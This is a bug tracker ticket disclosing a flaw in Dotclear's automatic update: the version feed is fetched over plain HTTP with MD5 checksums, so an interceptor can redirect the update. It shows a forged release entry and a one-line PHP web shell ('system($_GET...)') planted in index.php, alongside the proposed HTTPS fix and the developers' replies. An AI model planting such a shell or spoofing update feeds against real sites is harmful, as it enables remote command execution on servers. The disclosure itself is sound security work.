Ticket #2305 (closed defect: fixed)
Security issue - Update process
| Reported by: | Cervoise | Owned by: | team |
|---|---|---|---|
| Priority: | normal | Milestone: | 2.16 |
| Component: | security | Version: | 2.15.3 |
| Severity: | normal | Keywords: | |
| Cc: |
Description
I have found security issues in the automatic update functionality of Dotclear.
In order to get the last version, the following resource is requested by the server: http://download.dotclear.org/versions.xml. The download.dotclear.org server reply a XML file with latest versions and MD5 sum of each ZIP file:
<?xml version="1.0" encoding="UTF-8"?>
<versions>
<subject name="dotclear">
<release name="stable" version="2.15.3"
href="http://download.dotclear.org/latest/dotclear-2.15.3.zip"
checksum="80fb71d34b6c971e83d084af0ebac35f"
info="http://services.dotclear.net/redir?about=dotclear-2.15.3"
php="5.6"
/>
<release name="testing" version="2.15.2-r201910030959"
href="http://download.dotclear.org/nightly/dotclear-2.15.2-r201910030959.zip"
checksum="f68721637305432fb920b0f9c005accf"
info="http://services.dotclear.net/redir?about=dotclear-testing"
php="5.6"
/>
<release name="unstable" version="2.16-dev-r201910011045"
href="http://download.dotclear.org/nightly/unstable/dotclear-2.16-dev-r201910011045.zip"
checksum="ab9dd58eb309f7a34d83b31c310313f6"
info="http://services.dotclear.net/redir?about=dotclear-dev"
php="5.6"
/>
</subject>
</versions>
If a new version is available, the latest version file is downloaded and the patch is applied. In order to let the administrator revert the update, a backup file is created on the root directory of the web application:
/var/www/html$ ls dotclear admin CHANGELOG db LICENSE public var backup-2.15.2.zip CONTRIBUTING.md inc locales README.md cache CREDITS index.php plugins themes
In order to apply the update, files list in /inc/digests is used in order to know updated files and only backup and update needed files. There is a vulnerability in this process. If an attacker can intercept requests on the network (for example with a man in the middle), he can replace the response of the download.dotclear.org/versions.xml in order to force the CMS to download a malicious ZIP file.
<release name="stable" version="2.15.3"
href="http://192.168.1.80/dotclear-2.15.3.zip"
checksum="2f47c483e983f600f71cc52cc4f5be39"
info="http://services.dotclear.net/redir?about=dotclear-2.15.3"
php="5.6"
/>
The provided file is the official patch with only two edits, this line is added to the index.php file: if (isset($_GETcmd?)) {system($_GETcmd?);}. And the MD5sum of index.php is changed in inc/digests. This can be corrected by requesting https://download.dotclear.org/versions.xml for getting the version and by ensure that the server returns HTTPS reference for downloading the ZIP files.
Note 1: that there is no .htaccess files restricting someone to download the backup zip files or the inc/digest files. These files could help an attacker to find which version of dotclear is used. It would be better to restrict remote access to these files.
Note 2: for the full process, MD5 is used for check files integrity. This algorithm is no more recommended for this usage.
Note 3: I tried to report this using security(@)dotclear.net (http://dev.dotclear.org/2.0/) but I did not get any reply.
Change History
comment:2 Changed 6 years ago by franck
« In order to apply the update, files list in /inc/digests is used in order to know updated files and only backup and update needed files. »
It's not really how the digest file is used as its only purpose is to alert admin is any of current installed file has been modified since last update.
comment:3 Changed 5 years ago by franck
- Milestone set to 2.16
About “protection” on inc/digest there is an .htaccess file which deny all download from this folder.
comment:4 Changed 5 years ago by franck
- Status changed from new to closed
- Resolution set to fixed
See updates here → https://git.dotclear.org/dev/dotclear/issues/11
Thank's for the report. We will have a look ASAP on this issue.